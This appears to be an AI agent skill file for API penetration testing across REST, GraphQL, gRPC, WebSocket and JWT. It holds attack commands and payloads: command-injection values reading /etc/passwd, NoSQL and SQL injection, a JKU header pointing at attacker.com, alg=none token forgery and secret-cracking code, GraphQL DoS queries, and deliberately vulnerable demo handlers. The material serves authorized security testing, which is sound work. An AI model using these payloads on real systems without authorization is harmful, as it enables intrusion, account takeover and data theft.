api-security


API Security Testing


This skill enables comprehensive security testing of APIs including REST, GraphQL, gRPC, and WebSocket protocols. It covers the OWASP API Security Top 10 and provides practical testing methodologies for common API vulnerabilities.

When to Use This Skill


This skill should be invoked when:
  • Performing API penetration testing
  • Testing for OWASP API Security Top 10 vulnerabilities
  • Fuzzing REST/GraphQL/gRPC endpoints
  • Testing API authentication and authorization (BOLA/BFLA)
  • Analyzing OpenAPI/Swagger specifications
  • Testing JWT/OAuth implementations
  • Rate limiting and resource exhaustion testing

Trigger Phrases


  • "test this API for security issues"
  • "pentest the REST API"
  • "test GraphQL security"
  • "check for BOLA/IDOR vulnerabilities"
  • "analyze OpenAPI spec for security"
  • "test API authentication"
  • "fuzz API endpoints"

Prerequisites


Required Tools


| Tool | Purpose | Installation |
|---|---|---|
| Burp Suite | HTTP interception/testing | PortSwigger download |
| Postman | API testing/automation | postman.com |
| ffuf | API fuzzing | `go install github.com/ffuf/ffuf/v2@latest` |
| nuclei | Vulnerability scanning | `go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest` |
| jwt_tool | JWT analysis | `git clone https://github.com/ticarpi/jwt_tool && pip install -r jwt_tool/requirements.txt` (not a PyPI package) |
| graphql-cop | GraphQL scanning | `git clone https://github.com/dolevf/graphql-cop && pip install -r graphql-cop/requirements.txt` |
| arjun | Parameter discovery | `pip install arjun` |
| kiterunner | API endpoint discovery | GitHub release (assetnote/kiterunner) |

OWASP API Security Top 10 (2023)


Priority Testing Matrix


| Rank | Vulnerability | Impact | Detection |
|---|---|---|---|
| API1 | Broken Object Level Authorization (BOLA) | Critical | Manual + Automated |
| API2 | Broken Authentication | Critical | Manual + Tools |
| API3 | Broken Object Property Level Authorization | High | Manual |
| API4 | Unrestricted Resource Consumption | High | Automated |
| API5 | Broken Function Level Authorization (BFLA) | High | Manual |
| API6 | Unrestricted Access to Sensitive Business Flows | High | Manual |
| API7 | Server Side Request Forgery (SSRF) | High | Manual + Automated |
| API8 | Security Misconfiguration | Medium | Automated |
| API9 | Improper Inventory Management | Medium | Discovery |
| API10 | Unsafe Consumption of APIs | Medium | Code Review |

REST API Testing


Phase 1: Reconnaissance


```bash
# Discover API endpoints from documentation

# Fuzz for common API paths
ffuf -u https://target.com/FUZZ -w /path/to/api-wordlist.txt -mc 200,201,204,301,302,401,403

# Common API paths to check
# /api/ /api/v1/ /api/v2/ /rest/ /graphql /graphiql /api-docs /swagger /swagger-ui /swagger.json /openapi.json /.well-known/

# Discover parameters (arjun takes one HTTP method per run)
arjun -u https://target.com/api/users -m GET
arjun -u https://target.com/api/users -m POST
```

Phase 2: Authentication Testing


```bash
# JWT Analysis
jwt_tool <token> -T                          # Tampering tests
jwt_tool <token> -X a                        # Algorithm none attack
jwt_tool <token> -X k -pk public.pem         # Key confusion RS256->HS256 (needs the server's public key)
jwt_tool <token> -C -d /path/to/wordlist     # Crack weak HMAC secret

# OAuth Testing
# 1. Check for open redirect in redirect_uri (prefix/substring matching instead of exact match)
# 2. Test state parameter validation (missing, reusable, or not bound to the session)
# 3. Test PKCE enforcement (code exchange without code_verifier, or with plain instead of S256)
# 4. Check token leakage in referrer (tokens in the URL fragment/query of pages that load third-party content)

# API Key Testing
# 1. Check if key in URL (leaks in logs, proxies, browser history)
# 2. Test key rotation
# 3. Check key scoping
# 4. Test revoked key handling
```

Phase 3: Authorization Testing (BOLA/BFLA)


BOLA (Broken Object Level Authorization) Testing

1. Identify endpoints with object IDs:
   GET /api/users/{id}
   GET /api/orders/{id}
   PUT /api/documents/{id}
2. Create two test accounts (User A, User B)
3. As User A, access own resource: GET /api/users/123 -> 200 OK
4. As User A, try accessing User B's resource: GET /api/users/456 -> should be 403 (or 404, which avoids confirming the ID exists), not 200
5. Repeat with no token at all: a 200 here is missing authentication, not just missing authorization
6. Test ID types:
   - Sequential integers: 1, 2, 3...
   - UUIDs: may seem random but test anyway (they leak through other endpoints, exports and logs)
   - Encoded IDs: Base64, hex
   - Timestamps: predictable patterns

BFLA (Broken Function Level Authorization) Testing

1. Identify privileged endpoints:
   POST /api/admin/users
   DELETE /api/admin/config
   PUT /api/settings/global
2. As regular user, attempt admin actions
3. Test HTTP method switching: GET /api/users (allowed) -> POST /api/users (should check auth)
4. Test privilege parameters, including pollution: GET /api/users?role=user -> ?role=admin -> ?role=user&role=admin
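The differential check in steps 2 to 5 above, written out as an added example (not part of the original skill). The in-memory `vulnerable_api` / `fixed_api` handlers, the tokens and the records are constructed stand-ins for `GET /api/users/{id}` so the logic runs offline; against a real target, `fetch` would be a function that performs the HTTP request with the `Authorization` header and returns `(status, parsed_json)`.

```python
"""Differential BOLA check (added example, not part of the original skill).

`vulnerable_api` and `fixed_api` are constructed in-memory stand-ins for
GET /api/users/{id}. Replace `fetch` with a real HTTP call to test a target.
"""
from typing import Callable, Optional

# Constructed fixture: two accounts, their tokens, and who owns which object.
TOKENS = {"tokA": "user_a", "tokB": "user_b"}
OWNERS = {123: "user_a", 456: "user_b", 789: "user_b"}
RECORDS = {
    123: {"id": 123, "email": "usera@example.com"},
    456: {"id": 456, "email": "userb@example.com"},
    789: {"id": 789, "email": "userb-alt@example.com"},
}

Fetch = Callable[[str, str], tuple[int, Optional[dict]]]


def _object_id(path: str) -> int:
    return int(path.rsplit("/", 1)[1])


def vulnerable_api(path: str, token: str) -> tuple[int, Optional[dict]]:
    """Authenticates the caller but never checks who owns the object (BOLA)."""
    if token not in TOKENS:
        return 401, None
    oid = _object_id(path)
    if oid not in RECORDS:
        return 404, None
    return 200, RECORDS[oid]


def fixed_api(path: str, token: str) -> tuple[int, Optional[dict]]:
    """Same endpoint with an ownership check. Returns 404 rather than 403 so a
    rejected request does not confirm that the ID exists."""
    if token not in TOKENS:
        return 401, None
    oid = _object_id(path)
    if oid not in RECORDS or OWNERS[oid] != TOKENS[token]:
        return 404, None
    return 200, RECORDS[oid]


def bola_scan(fetch: Fetch, token_a: str, token_b: str, b_object_ids,
              template: str = "/api/users/{id}") -> list[dict]:
    """For each object known to belong to User B: confirm B can read it
    (baseline), then request it as User A and with no token at all.

    Returns one finding per object that A, or an anonymous caller, can read.
    """
    findings = []
    for oid in b_object_ids:
        path = template.format(id=oid)
        status_b, body_b = fetch(path, token_b)
        if status_b != 200:
            continue  # baseline failed: not B's object, or endpoint unusable
        status_anon, _ = fetch(path, "")
        status_a, body_a = fetch(path, token_a)
        if status_anon == 200 or status_a == 200:
            findings.append({
                "path": path,
                "status_a": status_a,
                "unauthenticated": status_anon == 200,  # no auth at all
                "same_body": body_a == body_b,          # A received B's record
            })
    return findings


if __name__ == "__main__":
    for name, api in (("vulnerable", vulnerable_api), ("fixed", fixed_api)):
        print(name, bola_scan(api, "tokA", "tokB", [456, 789]))
```

The baseline request as User B matters: without it, a 403 for User A could mean the ID simply does not exist, and the scan would under-report. `same_body` separates a true object leak from an endpoint that returns the caller's own record regardless of the ID.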

Phase 4: Input Validation Testing


```bash
# SQL Injection
sqlmap -u "https://target.com/api/users?id=1" --batch --dbs
sqlmap -r request.txt --batch --level 5 --risk 3   # request.txt: raw request saved from Burp, JSON body included

# NoSQL Injection payloads (send as the JSON body; object values become query operators)
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": "admin.*"}, "password": {"$ne": ""}}

# Command Injection in API parameters
{"cmd": "; ls -la"}
{"file": "test.txt; cat /etc/passwd"}
{"host": "localhost; whoami"}

# SSRF payloads: see payloads/ssrf_payloads.txt (bundled)
```
Phase 5: Rate Limiting & Resource Testing


```bash
# Test rate limiting
for i in {1..1000}; do
  curl -s -o /dev/null -w "%{http_code}\n" \
    -H "Content-Type: application/json" \
    "https://target.com/api/login" \
    -d '{"user":"test","pass":"test"}'
done | sort | uniq -c
# Expect 429s after the threshold; 1000 x 200/401 means no limit. Repeat from a second
# source IP and with an X-Forwarded-For header to check the limit is not keyed on spoofable input.

# Test pagination abuse
GET /api/users?limit=1000000
GET /api/users?page=-1
GET /api/users?offset=999999999

# Test field expansion
GET /api/users?expand=all
GET /api/users?fields=password,secret

# Test batch operations
POST /api/batch [array of 10000 requests]
```

---

GraphQL Security Testing


Discovery


```bash
# Common GraphQL endpoints
# /graphql /graphiql /graphql/console /graphql-explorer /v1/graphql

# Introspection query (if enabled)
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "{ __schema { types { name fields { name } } } }"}'

# Using graphql-cop for scanning (run from the cloned repository)
python3 graphql-cop.py -t https://target.com/graphql
```

GraphQL-Specific Attacks


```graphql
# Introspection Query (full schema)
{ __schema { queryType { name } mutationType { name } types { name fields { name args { name type { name } } type { name } } } } }

# Batching Attack (bypass rate limits): POST a JSON array of operations in a single request
[
  {"query": "mutation { login(user: \"admin\", pass: \"pass1\") { token } }"},
  {"query": "mutation { login(user: \"admin\", pass: \"pass2\") { token } }"},
  {"query": "mutation { login(user: \"admin\", pass: \"pass3\") { token } }"}
]

# Alias-based DoS (one request, many copies of the same expensive resolver)
{
  a1: users { id name }
  a2: users { id name }
  a3: users { id name }
  # ... repeat many times
}

# Deep Query DoS
{ users { friends { friends { friends { friends { name } } } } } }

# Directive Overloading
query @skip(if: false) @skip(if: false) @skip(if: false) { users { id } }

# Field Suggestion Exploit: a typo may reveal the field exists via "Did you mean ...?" suggestions
{ user { passwor } }
```
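The limits a target should enforce against the batching, alias, depth and directive payloads above, as an added example (not part of the original skill). The analysis is deliberately simplified: it strips string literals and argument lists, then counts braces, aliases and directives, which is enough to triage the page's payloads but is not a full GraphQL parser. `LIMITS` are illustrative values chosen for the demo, not recommendations, and the sample requests are constructed from the page's payloads.

```python
"""Static limit checks for GraphQL abuse patterns (added example, not part of
the original skill). Simplified tokenising; LIMITS are demo values."""
import re

LIMITS = {"depth": 4, "aliases": 5, "directives": 2, "batch": 2}


def _strip_strings(q: str) -> str:
    return re.sub(r'"(?:\\.|[^"\\])*"', '""', q)


def _strip_args(q: str) -> str:
    # Remove "(...)" argument lists so `id: 1` inside them is not counted as an alias.
    return re.sub(r"\([^()]*\)", "()", q)


def query_depth(q: str) -> int:
    """Maximum nesting of selection sets (the root set counts as 1)."""
    depth = deepest = 0
    for ch in _strip_strings(q):
        if ch == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif ch == "}":
            depth -= 1
    return deepest


def alias_count(q: str) -> int:
    return len(re.findall(r"\b\w+\s*:\s*\w+", _strip_args(_strip_strings(q))))


def directive_count(q: str) -> int:
    return len(re.findall(r"@\w+", _strip_strings(q)))


def inspect_request(body) -> list[str]:
    """`body` is the parsed JSON posted to /graphql: one operation object or a
    batch (list). Returns the limit violations, empty when the request is clean."""
    ops = body if isinstance(body, list) else [body]
    violations = []
    if len(ops) > LIMITS["batch"]:
        violations.append(f"batch of {len(ops)} operations")
    for i, op in enumerate(ops):
        q = op.get("query", "")
        checks = (("depth", query_depth(q)), ("aliases", alias_count(q)),
                  ("directives", directive_count(q)))
        for name, value in checks:
            if value > LIMITS[name]:
                violations.append(f"op{i}: {name}={value}")
    return violations


# Constructed requests mirroring the page's payloads.
DEEP = {"query": "{ users { friends { friends { friends { friends { name } } } } } }"}
ALIASED = {"query": "{ " + " ".join(f"a{i}: users {{ id name }}" for i in range(20)) + " }"}
DIRECTIVES = {"query": "query @skip(if: false) @skip(if: false) @skip(if: false) { users { id } }"}
BATCH = [{"query": f'mutation {{ login(user: "admin", pass: "pass{i}") {{ token }} }}'}
         for i in range(1, 4)]
CLEAN = {"query": 'query { user(id: "123") { id email } }'}

if __name__ == "__main__":
    for label, body in [("deep", DEEP), ("aliased", ALIASED), ("directives", DIRECTIVES),
                        ("batch", BATCH), ("clean", CLEAN)]:
        print(label, inspect_request(body))
```

From the tester's side the same numbers tell you what to escalate: if a request with depth 6, twenty aliases or a three-operation batch comes back 200 with full data, the server has no cost or batch limit and the DoS and rate-limit-bypass findings apply.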

BOLA in GraphQL


```graphql
# Test object-level authorization
query { user(id: "other-user-id") { email ssn creditCard } }

# Nested BOLA: swap the parent ID for another organisation's and check whether the
# nested users list still resolves (authorization is often checked only on the root field)
query { organization(id: "other-org-id") { users { id email } } }

# Mutation BOLA
mutation { updateUser(id: "other-user-id", input: { role: "admin" }) { id role } }
```

---

gRPC Security Testing


Setup


```bash
# Install grpcurl
go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest

# List services (requires server reflection; without it, supply the .proto with -proto service.proto)
grpcurl -plaintext localhost:50051 list

# Describe service
grpcurl -plaintext localhost:50051 describe UserService

# Call method
grpcurl -plaintext -d '{"id": "123"}' localhost:50051 UserService/GetUser

# Pass auth metadata the same way you would a header; drop -plaintext for TLS targets
grpcurl -H "authorization: Bearer $TOKEN" -d '{"id": "123"}' target.com:443 UserService/GetUser
```

gRPC Testing Areas


1. **Authentication**
   - Test metadata/header authentication
   - Check certificate validation (mTLS)
   - Test token handling

2. **Authorization**
   - BOLA on resource IDs
   - Method-level access control
   - Role-based restrictions

3. **Input Validation**
   - Protobuf field validation
   - Type confusion
   - Large message DoS

4. **Reflection**
   - Disable in production
   - Information disclosure via describe

5. **TLS Configuration**
   - Verify TLS is enforced
   - Check certificate pinning
   - Test cipher suites


WebSocket Security Testing


Discovery & Connection


```javascript
// Connect to WebSocket
const ws = new WebSocket('wss://target.com/ws');

ws.onopen = () => {
  console.log('Connected');
  ws.send(JSON.stringify({action: 'subscribe', channel: 'updates'}));
};

ws.onmessage = (event) => {
  console.log('Received:', event.data);
};
```

WebSocket Attacks


1. **Cross-Site WebSocket Hijacking (CSWSH)**
   - Check Origin header validation
   - Test from different domains

2. **Authorization**
   - Subscribe to unauthorized channels
   - Send actions without auth
   - Test BOLA on message IDs

3. **Injection**
   - SQL injection in messages
   - XSS in reflected content
   - Command injection

4. **DoS**
   - Message flooding
   - Large message size
   - Connection exhaustion
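The Origin check behind CSWSH (item 1 above) and the `redirect_uri` check from the OAuth testing phase fail in the same way, so one added example covers both (not part of the original skill): prefix matching instead of exact comparison. `ALLOWED`, `REGISTERED_REDIRECTS` and the test values are constructed.

```python
"""Allowlist matching for WebSocket Origin and OAuth redirect_uri (added
example, not part of the original skill). Values are constructed."""
from urllib.parse import urlsplit

ALLOWED = {"https://target.com", "https://app.target.com"}
REGISTERED_REDIRECTS = {"https://app.target.com/oauth/callback"}


def origin_allowed_vulnerable(origin: str) -> bool:
    """Prefix match: 'https://target.com.evil.com' passes."""
    return any(origin.startswith(a) for a in ALLOWED)


def origin_allowed_fixed(origin: str) -> bool:
    """Exact scheme+host[+port] comparison. A missing Origin and the literal
    'null' (sandboxed iframes, file://) are rejected rather than treated as
    'not a browser'; non-browser clients must authenticate some other way."""
    if not origin or origin == "null":
        return False
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.netloc:
        return False
    if parts.path or parts.query or parts.fragment:
        return False  # an Origin never carries a path; something is being smuggled
    return f"{parts.scheme}://{parts.netloc}".lower() in ALLOWED


def redirect_allowed_vulnerable(uri: str) -> bool:
    """Prefix match: any path under the callback passes, including a traversal
    to an open redirect on the same host."""
    return any(uri.startswith(r) for r in REGISTERED_REDIRECTS)


def redirect_allowed_fixed(uri: str) -> bool:
    """Exact string match against the registered value (OAuth 2.0 Security BCP)."""
    return uri in REGISTERED_REDIRECTS


if __name__ == "__main__":
    evil_origin = "https://target.com.evil.com"
    evil_redirect = "https://app.target.com/oauth/callback/../open?to=https://evil.com"
    print("origin  vulnerable/fixed:", origin_allowed_vulnerable(evil_origin),
          origin_allowed_fixed(evil_origin))
    print("redirect vulnerable/fixed:", redirect_allowed_vulnerable(evil_redirect),
          redirect_allowed_fixed(evil_redirect))
```

When testing, send the handshake with `Origin: https://target.com.evil.com`, with `Origin: null`, and with the header removed; a 101 on any of them is the CSWSH finding, provided the socket is authenticated by cookie. For `redirect_uri`, the same three classes of input (suffix host, path traversal, query string appended) distinguish prefix matching from exact matching.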

JWT Security Testing


Common JWT Attacks


```bash
# Decode JWT payload. Segments are base64url without padding: swap the alphabet and pad,
# or `base64 -d` fails on most tokens.
seg=$(printf '%s' "$JWT" | cut -d'.' -f2 | tr '_-' '/+')
printf '%s%s' "$seg" "$(printf '%.*s' $(( (4 - ${#seg} % 4) % 4 )) '===')" | base64 -d | jq

# Algorithm None Attack
# Change header to: {"alg": "none", "typ": "JWT"}   (also try "None", "NONE", "nOnE")
# Remove signature but keep the trailing dot: header.payload.

# Key Confusion (RS256 to HS256)
# If server uses RS256, try signing with HS256 using the server's public key (PEM bytes) as the HMAC secret

# Weak Secret Cracking
jwt_tool $JWT -C -d /path/to/wordlist.txt
hashcat -a 0 -m 16500 jwt.txt wordlist.txt

# Kid Header Injection
{"alg": "HS256", "typ": "JWT", "kid": "../../dev/null"}              # key file reads as empty -> sign with an empty secret
{"alg": "HS256", "typ": "JWT", "kid": "key' UNION SELECT 'secret'--"}   # if kid is looked up in SQL, you choose the secret

# JKU/X5U Header Injection
{"alg": "RS256", "jku": "https://attacker.com/jwks.json"}
# Host malicious JWKS with your keys (also try jku values on the target's own domain via open redirect)

# Expiration Bypass
# Modify exp claim to future date (only works if the signature is not checked)
# Test with expired tokens: the server should reject them outright
```
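The three attacks above that need no key material, worked with the standard library only, as an added example (not part of the original skill): the base64url decode the one-liner needs, an `alg: none` forgery, a verifier that dispatches on the header's `alg` beside one that pins the algorithm, and an offline HS256 secret brute force. The token, the secret and the wordlist are constructed here; RS256-to-HS256 key confusion is left out because it needs an RSA public key.

```python
"""JWT alg=none, algorithm pinning and HS256 secret cracking (added example,
not part of the original skill). Token and secret are constructed."""
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url_decode(seg: str) -> bytes:
    # JWT segments drop '=' padding; restore it or base64 decoding fails.
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def _hs256(signing_input: str, secret: str) -> str:
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return b64url_encode(mac)


def sign_hs256(payload: dict, secret: str) -> str:
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(payload)}"
    return f"{signing_input}.{_hs256(signing_input, secret)}"


def decode_unverified(token: str):
    """Header and payload as dicts plus the raw segments; no signature check."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), (h, p, s)


def forge_alg_none(token: str, **claims) -> str:
    """Rebuild the token with alg=none, changed claims and an empty signature."""
    _, payload, _ = decode_unverified(token)
    payload.update(claims)
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def verify_vulnerable(token: str, secret: str) -> Optional[dict]:
    """Dispatches on the header's alg, so 'none' means 'accept unsigned'."""
    header, payload, (h, p, s) = decode_unverified(token)
    alg = header.get("alg", "")
    if alg.lower() == "none":
        return payload
    if alg == "HS256" and hmac.compare_digest(_hs256(f"{h}.{p}", secret), s):
        return payload
    return None


def verify_fixed(token: str, secret: str) -> Optional[dict]:
    """The server knows it issues HS256; any other alg is rejected outright."""
    header, payload, (h, p, s) = decode_unverified(token)
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(_hs256(f"{h}.{p}", secret), s):
        return None
    return payload


def crack_hs256_secret(token: str, candidates) -> Optional[str]:
    """Offline brute force: recompute the MAC under each candidate secret."""
    _, _, (h, p, s) = decode_unverified(token)
    for secret in candidates:
        if hmac.compare_digest(_hs256(f"{h}.{p}", secret), s):
            return secret
    return None


if __name__ == "__main__":
    token = sign_hs256({"sub": "123", "role": "user"}, "secret123")  # constructed
    forged = forge_alg_none(token, role="admin")
    print("vulnerable verifier accepts forged token:", verify_vulnerable(forged, "secret123"))
    print("fixed verifier:", verify_fixed(forged, "secret123"))
    print("cracked secret:", crack_hs256_secret(token, ["password", "admin", "secret123"]))
```

The fix is not "reject `none`" but "never let the token choose the algorithm": `verify_fixed` also closes RS256-to-HS256 confusion on a server that issues RS256, because the expected algorithm is a server-side constant. `hmac.compare_digest` keeps the signature comparison constant-time.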

JWT Checklist


- [ ] Algorithm none vulnerability
- [ ] Key confusion (RS256 -> HS256)
- [ ] Weak HMAC secret
- [ ] Kid header injection (SQLi, path traversal)
- [ ] JKU/X5U URL injection
- [ ] Token expiration not validated
- [ ] Token not invalidated on logout
- [ ] Sensitive data in payload
- [ ] Token reuse after password change


API Fuzzing


Parameter Fuzzing


```bash
# Fuzz parameter values (object IDs for BOLA, with a valid token)
ffuf -u "https://target.com/api/users?id=FUZZ" \
  -w numbers.txt \
  -H "Authorization: Bearer $TOKEN" \
  -mc 200

# Fuzz JSON body
ffuf -u "https://target.com/api/users" \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{"role": "FUZZ"}' \
  -w roles.txt

# Parameter pollution
GET /api/users?id=1&id=2&id=admin

# Mass assignment
POST /api/users {"name": "test", "role": "admin", "isAdmin": true}
```
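The last two probes above, mass assignment and parameter pollution, shown from the server side as an added example (not part of the original skill). The handlers, the `WRITABLE_ON_CREATE` allowlist and the inputs are constructed.

```python
"""Mass assignment and parameter pollution (added example, not part of the
original skill). Handlers and inputs are constructed."""
from urllib.parse import parse_qs

WRITABLE_ON_CREATE = {"name", "email"}


def create_user_vulnerable(body: dict) -> dict:
    """Binds the whole JSON body onto the model; role and isAdmin come along."""
    user = {"id": 1, "role": "user", "isAdmin": False}
    user.update(body)
    return user


def create_user_fixed(body: dict) -> dict:
    """Allowlist of client-writable fields. Unknown fields are an error rather
    than silently dropped, so the contract is visible and the tester sees
    the rejection instead of wondering whether the field was applied."""
    unexpected = set(body) - WRITABLE_ON_CREATE
    if unexpected:
        raise ValueError(f"fields not writable: {sorted(unexpected)}")
    user = {"id": 1, "role": "user", "isAdmin": False}
    user.update({k: body[k] for k in WRITABLE_ON_CREATE if k in body})
    return user


def id_candidates(query_string: str) -> list[str]:
    """All values supplied for a repeated `id` parameter. Frameworks disagree on
    which one wins (first, last, or all of them), and a proxy or WAF in front
    may validate a different one than the backend uses, so test each position."""
    return parse_qs(query_string, keep_blank_values=True).get("id", [])


if __name__ == "__main__":
    probe = {"name": "test", "role": "admin", "isAdmin": True}
    print("vulnerable:", create_user_vulnerable(probe))
    try:
        create_user_fixed(probe)
    except ValueError as err:
        print("fixed:", err)
    print("pollution values:", id_candidates("id=1&id=2&id=admin"))
```

A 201 that echoes `"role": "admin"` back is the mass-assignment finding; a 201 that silently returns `"role": "user"` still deserves a follow-up `GET` to confirm the value was dropped rather than stored and hidden.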

Endpoint Fuzzing


```bash
# API endpoint discovery
ffuf -u "https://target.com/api/FUZZ" \
  -w api-endpoints.txt \
  -mc 200,201,204,301,302,401,403

# Version fuzzing (wordlist: v1, v2, v3, beta, internal)
ffuf -u "https://target.com/api/FUZZ/users" \
  -w versions.txt

# HTTP method fuzzing (curl -X HEAD waits for a body that never comes; the timeout keeps the loop moving)
for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; do
  curl -s -o /dev/null --max-time 10 -X "$method" -w "$method %{http_code}\n" https://target.com/api/admin
done
```

---

Nuclei API Templates


```bash
# Scan with API-specific templates
nuclei -u https://target.com/api -t exposures/
nuclei -u https://target.com/api -t vulnerabilities/
nuclei -u https://target.com/api -t misconfiguration/

# Scan a list of endpoints with your own template directory (api-tests/ is a placeholder name)
nuclei -l endpoints.txt -t api-tests/
# nuclei v3 can also read an OpenAPI/Swagger file as input directly:
nuclei -l openapi.yaml -im openapi -t api-tests/

# Custom API template (nuclei v3 uses the `http:` key; the older `requests:` key still loads but is deprecated)
cat > custom.yaml <<'EOF'
id: custom-api-test

info:
  name: Custom API Test
  author: tester
  severity: high

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/admin"
    matchers:
      - type: status
        status:
          - 200
EOF
nuclei -u https://target.com -t custom.yaml
```

---

Common Findings Template


BOLA Finding


[CRITICAL] Broken Object Level Authorization (BOLA)

Endpoint: GET /api/v1/users/{id}
OWASP API: API1:2023

Description


The API endpoint allows authenticated users to access other users' data by manipulating the ID parameter without proper authorization checks.

Evidence


Request as User A (ID: 123):

```http
GET /api/v1/users/456 HTTP/1.1
Authorization: Bearer <user_a_token>
```

Response:

```json
{
  "id": 456,
  "email": "userb@example.com",
  "ssn": "XXX-XX-XXXX"
}
```

Impact


  • Access to all user data
  • Privacy violation
  • Potential for data theft

Remediation


  • Implement object-level authorization checks
  • Verify requesting user owns or has access to requested resource
  • Use indirect references or verify ownership

References


Reporting Checklist



API Security Assessment Checklist


Authentication
- [ ] Authentication mechanism identified
- [ ] Token/session security tested
- [ ] Brute force protection tested
- [ ] Password policies verified

Authorization
- [ ] BOLA tested on all endpoints with IDs
- [ ] BFLA tested (privilege escalation)
- [ ] Role-based access verified
- [ ] Horizontal privilege escalation tested

Input Validation
- [ ] SQL injection tested
- [ ] NoSQL injection tested
- [ ] Command injection tested
- [ ] XXE tested (if XML accepted)
- [ ] SSRF tested on URL parameters

Rate Limiting
- [ ] Rate limiting present
- [ ] Bypass techniques tested
- [ ] Resource exhaustion tested

Information Disclosure
- [ ] Verbose errors disabled
- [ ] Stack traces hidden
- [ ] Internal IPs not leaked
- [ ] API versioning secure

Configuration
- [ ] HTTPS enforced
- [ ] CORS properly configured
- [ ] Security headers present
- [ ] Debug endpoints disabled

---

Bundled Resources


scripts/


  • bola_scanner.py
    - Automated BOLA testing
  • jwt_analyzer.py
    - JWT security analysis
  • graphql_introspection.py
    - GraphQL schema extraction
  • api_fuzzer.py
    - Parameter and endpoint fuzzing
  • openapi_parser.py
    - OpenAPI spec security analysis
  • rate_limit_tester.py
    - Rate limiting bypass testing

references/


  • owasp_api_top10.md
    - OWASP API Security Top 10 details
  • jwt_attacks.md
    - Comprehensive JWT attack guide
  • graphql_security.md
    - GraphQL security testing guide
  • rest_testing.md
    - REST API testing methodology

payloads/


  • sqli_api.txt
    - SQL injection payloads for APIs
  • nosql_injection.txt
    - NoSQL injection payloads
  • ssrf_payloads.txt
    - SSRF test URLs
  • bola_ids.txt
    - Common ID patterns for BOLA testing